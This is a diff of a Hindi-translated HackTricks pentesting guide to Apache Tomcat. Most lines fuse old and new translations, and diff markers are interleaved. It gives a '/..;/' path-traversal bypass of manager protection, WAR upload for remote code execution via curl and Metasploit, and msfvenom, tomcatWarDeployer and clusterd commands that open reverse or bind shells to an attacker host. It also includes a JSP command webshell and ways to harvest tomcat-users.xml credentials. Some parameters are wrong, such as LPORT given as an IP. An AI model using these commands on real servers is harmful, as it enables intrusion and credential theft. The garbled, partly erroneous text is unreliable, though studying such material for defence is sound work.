निम्नलिखित उदाहरण स्क्रिप्ट Apache Tomcat v4.x - v7.x के साथ आते हैं और हमलावरों द्वारा प्रणाली के बारे में जानकारी प्राप्त करने के लिए उपयोग किए जा सकते हैं। इन स्क्रिप्ट्स को भी क्रॉस साइट स्क्रिप्टिंग (XSS) इंजेक्शन के लिए संवेदनशील माना जाता है (यहां से [यहां](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/) देखें)। निम्नलिखित उदाहरण स्क्रिप्ट जो Apache Tomcat v4.x - v7.x के साथ आते हैं और हमलावरों को सिस्टम के बारे में जानकारी प्राप्त करने के लिए उपयोग किए जा सकते हैं। इन स्क्रिप्ट्स को भी क्रॉस साइट स्क्रिप्टिंग (XSS) इन्जेक्शन के लिए कमजोर माना जाता है (से [यहाँ](https://www.rapid7.com/db/vulnerabilities/apache-tomcat-example-leaks/))।
* /उदाहरण/jsp/num/numguess.jsp * /examples/jsp/num/numguess.jsp
* /उदाहरण/jsp/dates/date.jsp * /examples/jsp/dates/date.jsp
* /उदाहरण/jsp/snp/snoop.jsp * /examples/jsp/snp/snoop.jsp
* /उदाहरण/jsp/error/error.html * /examples/jsp/error/error.html
* /उदाहरण/jsp/sessions/carts.html * /examples/jsp/sessions/carts.html
* /उदाहरण/jsp/checkbox/check.html * /examples/jsp/checkbox/check.html
* /उदाहरण/jsp/colors/colors.html * /examples/jsp/colors/colors.html
* /उदाहरण/jsp/cal/login.html * /examples/jsp/cal/login.html
* /उदाहरण/jsp/include/include.jsp * /examples/jsp/include/include.jsp
* /उदाहरण/jsp/forward/forward.jsp * /examples/jsp/forward/forward.jsp
* /उदाहरण/jsp/plugin/plugin.jsp * /examples/jsp/plugin/plugin.jsp
* /उदाहरण/jsp/jsptoserv/jsptoservlet.jsp * /examples/jsp/jsptoserv/jsptoservlet.jsp
* /उदाहरण/jsp/simpletag/foo.jsp * /examples/jsp/simpletag/foo.jsp
* /उदाहरण/jsp/mail/sendmail.jsp * /examples/jsp/mail/sendmail.jsp
* /उदाहरण/servlet/HelloWorldExample * /examples/servlet/HelloWorldExample
* /उदाहरण/servlet/RequestInfoExample * /examples/servlet/RequestInfoExample
* /उदाहरण/servlet/RequestHeaderExample * /examples/servlet/RequestHeaderExample
* /उदाहरण/servlet/RequestParamExample * /examples/servlet/RequestParamExample
* /उदाहरण/servlet/CookieExample * /examples/servlet/CookieExample
* /उदाहरण/servlet/JndiServlet * /examples/servlet/JndiServlet
* /उदाहरण/servlet/SessionExample * /examples/servlet/SessionExample
* /tomcat-docs/appdev/sample/web/hello.jsp * /tomcat-docs/appdev/sample/web/hello.jsp
### पथ ट्रावर्सल (..;/) ### पथ ट्रावर्सल (..;/)
कुछ [**तोमकैट**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) के कमजोर विन्यासों में आप `/..;/` का उपयोग करके तोमकैट में संरक्षित निर्देशिकाओं तक पहुंच प्राप्त कर सकते हैं। कुछ [**Tomcat की कमजोर विन्यास**](https://www.acunetix.com/vulnerabilities/web/tomcat-path-traversal-via-reverse-proxy-mapping/) में आप `/..;/` पथ का उपयोग करके Tomcat में संरक्षित निर्देशिकाओं तक पहुंच सकते हैं।
इसलिए, उदाहरण के लिए, आप शायद तोमकैट प्रबंधक पृष्ठ तक पहुंच सकते हैं इस तरह से: `www.vulnerable.com/lalala/..;/manager/html` इसलिए, उदाहरण के लिए, आप **Tomcat प्रबंधक** पृष्ठ तक पहुंच सकते हैं: `www.vulnerable.com/lalala/..;/manager/html`
इस ट्रिक का उपयोग करके संरक्षित पथों को छोड़ने के लिए एक और तरीका है `http://www.vulnerable.com/;param=value/manager/html` तक पहुंचना। इस ट्रिक का उपयोग करके संरक्षित पथों को छलकरने का **एक और तरीका** है `http://www.vulnerable.com/;param=value/manager/html`
## RCE ## RCE
अंत में, यदि आपके पास तोमकैट वेब एप्लिकेशन प्रबंधक तक पहुंच है, तो आप **एक .war फ़ाइल अपलोड और डिप्लॉय कर सकते हैं (कोड निष्पादित करें)** अंततः, यदि आपके पास Tomcat वेब एप्लिकेशन प्रबंधक तक पहुंच है, तो आप **.war फ़ाइल अपलोड और डिप्लॉय कर सकते हैं (कोड को निष्पादित करें)**।
### सीमाएँ ### सीमाएँ
आप केवल तब WAR डिप्लॉय कर सकेंगे जब आपके पास **पर्याप्त विशेषाधिकार** होंगे (भूमिकाएँ: **व्यवस्थापक**, **प्रबंधक** और **प्रबंधक-स्क्रिप्ट**)। इन विवरणों को आमतौर पर `/usr/share/tomcat9/etc/tomcat-users.xml` में परिभाषित किया जाता है (यह संस्करणों के बीच भिन्न हो सकता है) (अधिक जानकारी के लिए [POST ](tomcat.md#post)अनुभाग देखें)। आप केवल तब WAR डिप्लॉय कर सकेंगे अगर आपके पास **पर्याप्त विशेषाधिकार** हैं (भूमिकाएँ: **व्यवस्थापक**, **प्रबंधक** और **प्रबंधक-स्क्रिप्ट**)। ये विवरण आम तौर पर `/usr/share/tomcat9/etc/tomcat-users.xml` में परिभाषित होते हैं (संस्करणों के बीच भिन्न हो सकते हैं) (देखें [POST ](tomcat.md#post)खंड)।
```bash ```bash
# tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed # tomcat6-admin (debian) or tomcat6-admin-webapps (rhel) has to be installed
@ -137,13 +137,7 @@ curl --upload-file monshell.war -u 'tomcat:password' "http://localhost:8080/mana
# undeploy # undeploy
curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell" curl "http://tomcat:Password@localhost:8080/manager/text/undeploy?path=/monshell"
``` ```
### Metasploit ### मेटास्प्लॉइट
Metasploit एक शक्तिशाली और लोकप्रिय हैकिंग फ्रेमवर्क है जिसका उपयोग नेटवर्क सुरक्षा और पेंटेस्टिंग के लिए किया जाता है। यह एक ओपन सोर्स टूल है जिसे Rapid7 द्वारा विकसित किया गया है। Metasploit कई विभिन्न हैकिंग टेक्निक्स का समर्थन करता है जैसे कि रिमोट एक्सप्लोइटेशन, पोर्ट स्कैनिंग, पासवर्ड क्रैकिंग, और वेब एप्लिकेशन पेंटेस्टिंग। Metasploit का उपयोग करके हैकर्स नेटवर्क परिक्षण कर सकते हैं, सुरक्षा कमजोरियों को खोज सकते हैं और वेब एप्लिकेशनों को अद्यतित कर सकते हैं।
Metasploit के विभिन्न मॉड्यूल्स उपलब्ध होते हैं जो विभिन्न हैकिंग कार्यों को संभव बनाते हैं। इन मॉड्यूल्स का उपयोग करके हैकर्स एक निश्चित निर्देशिका में उपयुक्त एक्शन्स को चला सकते हैं, जैसे कि एक शैलीश एक्सप्लोइट को चलाना, एक शैलीश शेल तक पहुंच प्राप्त करना, या एक शैलीश शेल के माध्यम से रिमोट मशीन को नियंत्रित करना।
Metasploit का उपयोग करने के लिए, हैकर्स को एक मेटरप्रेटर कंट्रोल कंसोल में काम करना होता है जिसे वे एक निश्चित निर्देशिका के साथ शुरू कर सकते हैं। इसके बाद, हैकर्स विभिन्न मॉड्यूल्स का उपयोग करके निर्देशिका में उपयुक्त कार्रवाईयों को चला सकते हैं। Metasploit एक शक्तिशाली और व्यापक फ्रेमवर्क है जो हैकर्स को नेटवर्क पेंटेस्टिंग के लिए एक सरल और सुरक्षित तरीके से उपकरण प्रदान करता है।
```bash ```bash
use exploit/multi/http/tomcat_mgr_upload use exploit/multi/http/tomcat_mgr_upload
msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP> msf exploit(multi/http/tomcat_mgr_upload) > set rhost <IP>
@ -152,59 +146,35 @@ msf exploit(multi/http/tomcat_mgr_upload) > set httpusername <username>
msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password> msf exploit(multi/http/tomcat_mgr_upload) > set httppassword <password>
msf exploit(multi/http/tomcat_mgr_upload) > exploit msf exploit(multi/http/tomcat_mgr_upload) > exploit
``` ```
### MSFVenom रिवर्स शेल ### MSFVenom रिवर्स शैल
एमएसएफवेनम रिवर्स शेल एक टूल है जिसका उपयोग एक विंडोज या लिनक्स मशीन पर रिवर्स शेल उत्पन्न करने के लिए किया जाता है। यह टूल एक विंडोज या लिनक्स मशीन पर एक रिवर्स शेल बनाने के लिए विभिन्न प्रकार के परिवर्तनों का उपयोग करता है, जैसे कि पोर्ट, एचटीटीपी और एन्कोडिंग आदि। इसका उपयोग एक विंडोज या लिनक्स मशीन पर रिमोट एक्सीक्यूशन को संभव बनाने के लिए किया जा सकता है।
इस टूल का उपयोग करने के लिए, आपको एक रिवर्स शेल पेयलोड बनाने के लिए विभिन्न पैरामीटर्स को सेट करने की आवश्यकता होती है। इन पैरामीटर्स में आपको अपने लक्ष्य मशीन के लिए एक उपयुक्त पोर्ट, एचटीटीपी, एन्कोडिंग और एक आवश्यक फ़ाइल नाम निर्दिष्ट करने की आवश्यकता होती है।
एमएसएफवेनम रिवर्स शेल टूल का उपयोग करने के लिए, आपको निम्नलिखित कमांड का उपयोग करना होगा:
```bash
msfvenom -p <payload> LHOST=<your IP> LPORT=<your port> -f <format> -e <encoder> -o <output file>
```
यहां, `<payload>` आपके उद्देश्य के अनुसार एक रिवर्स शेल पेयलोड का नाम होना चाहिए, `<your IP>` आपके लक्ष्य मशीन का आईपी पता होना चाहिए, `<your port>` आपके लक्ष्य मशीन के लिए एक उपयुक्त पोर्ट नंबर होना चाहिए, `<format>` आपके द्वारा चुने गए आउटपुट फ़ाइल का प्रारूप होना चाहिए, `<encoder>` आपके द्वारा चुने गए एन्कोडर का नाम होना चाहिए, और `<output file>` आपके द्वारा चुने गए आउटपुट फ़ाइल का नाम होना चाहिए।
इसके बाद, आपको अपने उत्पन्न रिवर्स शेल पेयलोड को लक्ष्य मशीन पर एक उचित तरीके से प्रस्तुत करने की आवश्यकता होती है, जैसे कि एक वेब पेज के माध्यम से या एक अन्य तकनीक का उपयोग करके। जब आपका लक्ष्य मशीन रिवर्स शेल पेयलोड को स्वीकार करता है, तो आप उस मशीन पर रिमोट एक्सीक्यूशन को संभव बना सकते हैं।
```bash ```bash
msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war msfvenom -p java/shell_reverse_tcp LHOST=<LHOST_IP> LPORT=<LHOST_IP> -f war -o revshell.war
``` ```
फिर, **`revshell.war` फ़ाइल अपलोड करें और इसे एक्सेस करें (**_**/revshell/**_**)** फिर, **`revshell.war` फ़ाइल अपलोड करें और इसे तक पहुँचें (**_**/revshell/**_**)**
### [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) के साथ बाइंड और रिवर्स श ### [tomcatWarDeployer.py](https://github.com/mgeeky/tomcatWarDeployer) के साथ बाइंड और रिवर्स शैल
कुछ स्थितियों में यह काम नहीं करता है (उदाहरण के लिए सन के पुराने संस्करणों में) कुछ स्थितियों में यह काम नहीं करता है (उदाहरण के लिए sun के पुराने संस्करणों में)
#### डाउनलोड करें #### डाउनलोड
```bash ```bash
git clone https://github.com/mgeeky/tomcatWarDeployer.git git clone https://github.com/mgeeky/tomcatWarDeployer.git
``` ```
#### रिवर्स शेल #### रिवर्स शैल
A reverse shell is a type of shell in which the target machine initiates the connection to the attacker's machine. This allows the attacker to gain remote access to the target machine and execute commands. Reverse shells are commonly used in penetration testing and hacking activities.
To create a reverse shell, the attacker needs to set up a listener on their machine and then exploit a vulnerability on the target machine to establish a connection. Once the connection is established, the attacker can interact with the target machine's command prompt and execute commands as if they were physically present on the machine.
Reverse shells can be created using various techniques and tools, such as Netcat, Metasploit, or custom scripts. The choice of technique depends on the specific scenario and the available tools.
It is important to note that reverse shells are considered malicious and unauthorized in most cases. They are used by attackers to gain unauthorized access to systems and carry out malicious activities. As a responsible hacker or penetration tester, it is crucial to obtain proper authorization and follow ethical guidelines when performing any kind of hacking activity.
```bash ```bash
./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/ ./tomcatWarDeployer.py -U <username> -P <password> -H <ATTACKER_IP> -p <ATTACKER_PORT> <VICTIM_IP>:<VICTIM_PORT>/manager/html/
``` ```
#### बाइंड शेल #### बाइंड शैल
A bind shell is a type of shell that allows an attacker to gain remote access to a target system. It works by binding a shell to a specific port on the target system, allowing the attacker to connect to that port and gain control over the system. Once the connection is established, the attacker can execute commands on the target system as if they were sitting in front of it. Bind shells are commonly used in network penetration testing to gain unauthorized access to a target system.
```bash ```bash
./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/ ./tomcatWarDeployer.py -U <username> -P <password> -p <bind_port> <victim_IP>:<victim_PORT>/manager/html/
``` ```
### [Culsterd](https://github.com/hatRiot/clusterd) का उपयोग करें ### [Culsterd](https://github.com/hatRiot/clusterd) का उपयोग
```bash ```bash
clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows clusterd.py -i 192.168.1.105 -a tomcat -v 5.5 --gen-payload 192.168.1.6:4444 --deploy shell.war --invoke --rand-payload -o windows
``` ```
### मैन्युअल तरीका - वेब शैल ### मैन्युअल विधि - वेब शैल
इस [सामग्री](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) के साथ **index.jsp** बनाएं: **index.jsp** बनाएं और इस [सामग्री](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) के साथ:
```java ```java
<FORM METHOD=GET ACTION='index.jsp'> <FORM METHOD=GET ACTION='index.jsp'>
<INPUT name='cmd' type=text> <INPUT name='cmd' type=text>
@ -235,9 +205,7 @@ jar -cvf ../webshell.war *
webshell.war is created webshell.war is created
# Upload it # Upload it
``` ```
आप इसे भी स्थापित कर सकते हैं (अपलोड, डाउनलोड और कमांड निष्पादन की अनुमति देता है): [http://vonloesch.de/filebrowser.html](http://vonloesch.de/filebrowser.html) ### मैन्युअल विधि 2
### मैन्युअल तरीका 2
एक JSP वेब शैल जैसे [यह](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) प्राप्त करें और एक WAR फ़ाइल बनाएं: एक JSP वेब शैल जैसे [यह](https://raw.githubusercontent.com/tennc/webshell/master/fuzzdb-webshell/jsp/cmd.jsp) प्राप्त करें और एक WAR फ़ाइल बनाएं:
```bash ```bash
@ -248,11 +216,11 @@ zip -r backup.war cmd.jsp
``` ```
## POST ## POST
Tomcat क्रेडेंशियल फ़ाइल का नाम _tomcat-users.xml_ है। टॉमकैट क्रेडेंशियल्स फ़ाइल का नाम _tomcat-users.xml_ है।
```bash ```bash
find / -name tomcat-users.xml 2>/dev/null find / -name tomcat-users.xml 2>/dev/null
``` ```
Tomcat क्रेडेंशियल्स इकट्ठा करने के अन्य तरीके: टॉमकैट क्रेडेंशियल्स जुटाने के अन्य तरीके:
```bash ```bash
msf> use post/multi/gather/tomcat_gather msf> use post/multi/gather/tomcat_gather
msf> use post/windows/gather/enum_tomcat msf> use post/windows/gather/enum_tomcat
@ -260,22 +228,3 @@ msf> use post/windows/gather/enum_tomcat
## अन्य टॉमकैट स्कैनिंग टूल ## अन्य टॉमकैट स्कैनिंग टूल
* [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner) * [https://github.com/p0dalirius/ApacheTomcatScanner](https://github.com/p0dalirius/ApacheTomcatScanner)
<details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
विकर्षक आपके सबसे महत्वपूर्ण संकटों को खोजता है ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमला क्षेत्र का पता लगाता है, प्रोएक्टिव धारणा स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक आपकी पूरी टेक स्टैक में मुद्दों को खोजता है। [**इसे नि: शुल्क में आज़माएं**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)।
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी को HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop) की जांच करें!
* खोजें [**The PEASS Family**](https://opensea.io/collection/the-peass-family), हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family)
* प्राप्त करें [**आधिकारिक PEASS & HackTricks swag**](https://peass.creator-spring.com)
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।**
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।**
</details>

View file

@ -1,20 +1,20 @@
# मूलभूत टॉमकैट जानकारी # मूल टॉमकैट जानकारी
<details> <details>
<summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ HackTricks Cloud ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 Twitter 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ Twitch 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 Youtube 🎥</strong></a></summary> <summary><a href="https://cloud.hacktricks.xyz/pentesting-cloud/pentesting-cloud-methodology"><strong>☁️ हैकट्रिक्स क्लाउड ☁️</strong></a> -<a href="https://twitter.com/hacktricks_live"><strong>🐦 ट्विटर 🐦</strong></a> - <a href="https://www.twitch.tv/hacktricks_live/schedule"><strong>🎙️ ट्विच 🎙️</strong></a> - <a href="https://www.youtube.com/@hacktricks_LIVE"><strong>🎥 यूट्यूब 🎥</strong></a></summary>
* क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी कंपनी को **HackTricks में विज्ञापित** देखना चाहते हैं? या क्या आपको **PEASS के नवीनतम संस्करण या HackTricks को PDF में डाउनलोड करने का उपयोग** करने की आवश्यकता है? [**सदस्यता योजनाएं**](https://github.com/sponsors/carlospolop) की जांच करें! * क्या आप **साइबर सुरक्षा कंपनी** में काम करते हैं? क्या आप अपनी **कंपनी का हैकट्रिक्स में विज्ञापन देखना चाहते हैं**? या क्या आप **PEASS के नवीनतम संस्करण या हैकट्रिक्स को पीडीएफ में डाउनलोड करना चाहते हैं**? [**सब्सक्रिप्शन प्लान्स**](https://github.com/sponsors/carlospolop) की जांच करें!
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष संग्रह [**NFTs**](https://opensea.io/collection/the-peass-family) * [**द पीएस फैमिली**](https://opensea.io/collection/the-peass-family) की खोज करें, हमारा विशेष [**एनएफटीएस**](https://opensea.io/collection/the-peass-family) संग्रह।
* [**आधिकारिक PEASS और HackTricks swag**](https://peass.creator-spring.com) प्राप्त करें * [**आधिकारिक पीएस और हैकट्रिक्स स्वैग**](https://peass.creator-spring.com) प्राप्त करें
* **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या मुझे **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/hacktricks_live)** का पालन करें।** * **शामिल हों** [**💬**](https://emojipedia.org/speech-balloon/) [**डिस्कॉर्ड समूह**](https://discord.gg/hRep4RUj7f) या [**टेलीग्राम समूह**](https://t.me/peass) या **मुझे** **ट्विटर** **🐦**[**@carlospolopm**](https://twitter.com/hacktricks_live)** पर** **फॉलो** करें।
* **अपने हैकिंग ट्रिक्स को [hacktricks रेपो](https://github.com/carlospolop/hacktricks) और [hacktricks-cloud रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके साझा करें।** * **हैकिंग ट्रिक्स साझा करें, [हैकट्रिक्स रेपो](https://github.com/carlospolop/hacktricks) और [हैकट्रिक्स-क्लाउड रेपो](https://github.com/carlospolop/hacktricks-cloud) में पीआर जमा करके**
</details> </details>
<figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure> <figure><img src="/.gitbook/assets/image (675).png" alt=""><figcaption></figcaption></figure>
िशेषता को ध्यान में रखते हुए विकल्पों को खोजें ताकि आप उन्हें तेजी से ठीक कर सकें। Intruder आपकी हमला सतह का ट्रैक करता है, प्रोएक्टिव धमकी स्कैन चलाता है, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक आपके पूरे टेक स्टैक में मुद्दों का पता लगाता है। [**आज ही मुफ्त में इसे प्रयास करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks)। े सुरक्षा गड़बड़ियों को खोजें जो सबसे अधिक मायने रखती हैं ताकि आप उन्हें तेजी से ठीक कर सकें। इंट्रूडर आपकी हमले की सतह का ट्रैक करता है, प्रोएक्टिव धारणा स्कैन चलाता है, आपकी पूरी तकनीकी स्टैक, एपीआई से वेब ऐप्स और क्लाउड सिस्टम तक मुद्दे खोजता है। [**यह नि: शुल्क ट्राय करें**](https://www.intruder.io/?utm\_source=referral\&utm\_campaign=hacktricks) आज
{% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %} {% embed url="https://www.intruder.io/?utm_campaign=hacktricks&utm_source=referral" %}
@ -22,7 +22,7 @@
### रूट के साथ न चलाएं ### रूट के साथ न चलाएं
टॉमकैट को रूट के साथ न चलाने के लिए एक बहुत सामान्य कॉन्फ़िगरेशन है कि पोर्ट 80/443 में एक अपाची सर्वर सेट किया जाता है और यदि अनुरोधित पथ एक रेजेक्स के साथ मेल खाता है, तो अनुरोध एक अलग पोर्ट पर चल रहे टॉमकैट को भेजा जाता है। रूट के साथ टॉमकैट न चलाने के लिए एक बहुत ही सामान्य कॉन्फ़िगरेशन है कि पोर्ट 80/443 में एक एपाच सर्वर सेट करना और, यदि अनुरोधित पथ एक रेगेक्स से मेल खाता है, तो अनुरोध टॉमकैट को एक विभिन्न पोर्ट पर चलाया जाता है।
### डिफ़ॉल्ट संरचना ### डिफ़ॉल्ट संरचना
``` ```
@ -49,15 +49,14 @@
└── Catalina └── Catalina
└── localhost └── localhost
``` ```
* `WEB-INF` folder: This folder contains the web application's configuration files and classes. * `bin` फ़ोल्डर में स्क्रिप्ट और बाइनरी स्टोर किए जाते हैं जो टॉमकैट सर्वर को शुरू और चलाने के लिए आवश्यक होते हैं।
* `META-INF` folder: This folder contains the application's metadata files, such as the manifest file. * `conf` फ़ोल्डर में विभिन्न कॉन्फ़िगरेशन फ़ाइलें स्टोर की जाती हैं जो टॉमकैट द्वारा उपयोग की जाती हैं।
* Other files and folders: These can include HTML, CSS, JavaScript, and other resources used by the web application. * `tomcat-users.xml` फ़ाइल उपयोगकर्ता क्रेडेंशियल्स और उनके दायित्विक भूमिकाएँ स्टोर करती है।
* `lib` फ़ोल्डर में टॉमकैट के सही काम के लिए आवश्यक विभिन्न JAR फ़ाइलें होती हैं।
* `logs` और `temp` फ़ोल्डर अस्थायी लॉग फ़ाइलें स्टोर करते हैं।
* `webapps` फ़ोल्डर टॉमकैट का डिफ़ॉल्ट वेबरूट है और सभी एप्लिकेशन्स को होस्ट करता है। `work` फ़ोल्डर एक कैश के रूप में काम करता है और रनटाइम के दौरान डेटा स्टोर करने के लिए उपयोग किया जाता है।
To access the Tomcat server, you can use a web browser and navigate to `http://<ip_address>:<port>`. The default port for Tomcat is 8080. `webapps` के अंदर हर फ़ोल्डर की निम्नलिखित संरचना होनी चाहिए।
To exploit vulnerabilities in Tomcat, you can use various techniques such as directory traversal, file inclusion, and remote code execution. These techniques can allow an attacker to gain unauthorized access, execute arbitrary code, or retrieve sensitive information.
It is important to regularly update Tomcat to the latest version and apply security patches to mitigate potential vulnerabilities. Additionally, strong passwords should be used for user accounts and unnecessary services should be disabled to reduce the attack surface.
``` ```
webapps/customapp webapps/customapp
├── images ├── images
@ -74,10 +73,10 @@ webapps/customapp
└── classes └── classes
└── AdminServlet.class └── AdminServlet.class
``` ```
सभी फ़ाइलों में सबसे महत्वपूर्ण फ़ाइल `WEB-INF/web.xml` है, जिसे डिप्लॉयमेंट विवरणकारी के रूप में जाना जाता है। इस फ़ाइल में **रूट्स के बारे में जानकारी** और इन रूट्स को हैंडल करने वाली कक्षाएं संग्रहीत होती हैं।\ सभी में से सबसे महत्वपूर्ण फ़ाइल `WEB-INF/web.xml` है, जिसे डिप्लॉयमेंट डिस्क्रिप्टर के रूप में जाना जाता है। इस फ़ाइल में **ऐसी जानकारी संग्रहीत है जो एप्लिकेशन द्वारा उपयोग किए जाने वाले रूट्स के बारे में** और इन रूट्स को हैंडल करने वाली कक्षाएँ के बारे में है।\
एप्लिकेशन द्वारा उपयोग की जाने वाली सभी कंपाइल की गई कक्षाएं `WEB-INF/classes` फ़ोल्डर में संग्रहीत होनी चाहिए। इन कक्षाओं में महत्वपूर्ण व्यावसायिक तर्क और संवेदनशील जानकारी हो सकती है। इन फ़ाइलों में किसी भी सुरक्षा कमजोरी से वेबसाइट का पूर्ण संक्रमण हो सकता है। `lib` फ़ोल्डर उस विशेष एप्लिकेशन के लिए आवश्यक पुस्तकालयों को संग्रहत करता है। `jsp` फ़ोल्डर [जकार्ता सर्वर पेज (JSP)](https://en.wikipedia.org/wiki/Jakarta\_Server\_Pages) को संग्रहीत करता है, जिसे पहले `JavaServer Pages` के नाम से जाना जाता था, जो एक Apache सर्वर पर PHP फ़ाइलों के समान हो सकते ह एप्लिकेशन द्वारा उपयोग किए जाने वाले सभी कंपाइल कक्षाएँ `WEB-INF/classes` फ़ोल्डर में संग्रहीत होनी चाहिए। ये कक्षाएँ महत्वपूर्ण व्यावसायिक तर्क और संवेदनशील जानकारी भी संग्रहित कर सकती हैं। इन फ़ाइलों में कोई भी सुरक्षा दोष वेबसाइट का पूरी तरह से कमजोर होने की ओर ले जा सकता है। `lib` फ़ोल्डर उस विशेष एप्लिकेशन के लिए आवश्यक पुस्तकालयों को संग्रहित करता है। `jsp` फ़ोल्डर [जकार्ता सर्वर पेज्स (JSP)](https://en.wikipedia.org/wiki/Jakarta\_Server\_Pages) को संग्रहित करता है, जिसे पहले `JavaServer Pages` के रूप में जाना जाता था, जो एक अपाचे सर्वर पर PHP फ़ाइलों के समान है।
यहा एक उदाहरण **web.xml** फ़ाइल है। यहा एक उदाहरण **web.xml** फ़ाइल है।
```xml ```xml
<?xml version="1.0" encoding="ISO-8859-1"?> <?xml version="1.0" encoding="ISO-8859-1"?>
@ -95,15 +94,15 @@ webapps/customapp
</servlet-mapping> </servlet-mapping>
</web-app> </web-app>
``` ```
ऊपर दिए गए `web.xml` कॉन्फ़िगरेशन में एक **नया सर्वलेट `AdminServlet`** परिभाषित किया गया है जो **`com.inlanefreight.api.AdminServlet`** क्लास से मैप किया गया है। जावा पैकेज नाम बनाने के लिए डॉट नोटेशन का उपयोग करता है, इसका मतलब है कि ऊपर परिभाषित क्लास के लिए डिस्क पर पथ होगा: ऊपर दिया गया `web.xml` कॉन्फ़िगरेशन एक **नया सर्वलेट जिसका नाम `AdminServlet`** है को **कक्ष `com.inlanefreight.api.AdminServlet`** से मैप करता है। जावा डॉट नोटेशन का उपयोग पैकेज नाम बनाने के लिए करता है, इसका मतलब ऊपर परिभाषित कक्ष के लिए डिस्क पर पथ होगा:
* **`classes/com/inlanefreight/api/AdminServlet.class`** * **`classes/com/inlanefreight/api/AdminServlet.class`**
अगले, एक नया सर्वलेट मैपिंग बनाया जाता है जो **`/admin` के लिए `AdminServlet` के साथ मैप करता है**। यह कॉन्फ़िगरेशन किसी भी अनुरोध को **`/admin` के लिए `AdminServlet.class`** क्लास को प्रोसेस करने के लिए भेजेगा। **`web.xml`** डिस्क्रिप्टर में बहुत सारी **संवेदनशील जानकारी** होती है और यह एक महत्वपूर्ण फ़ाइल है जो एक **स्थानिक फ़ाइल सम्मिलन (LFI) संवेदनशीलता** का उपयोग करते समय जांचने के लिए होती है। अगले, एक नया सर्वलेट मैपिंग बनाया जाता है **`AdminServlet` के साथ `/admin` के लिए अनुरोधों को मैप करने के लिए**। यह कॉन्फ़िगरेशन किसी भी अनुरोध को **`/admin` के लिए `AdminServlet.class`** कक्ष को प्रोसेस करने के लिए भेजेगा। **`web.xml`** विवरणकर्ता में कई **संवेदनशील जानकारी** होती है और यह एक महत्वपूर्ण फ़ाइल है जो जांचने के लिए होती है जब एक **स्थानीय फ़ाइल समावेशन (LFI) वंशावली** का लाभ उठाया जाता है।
### tomcat-users ### tomcat-users
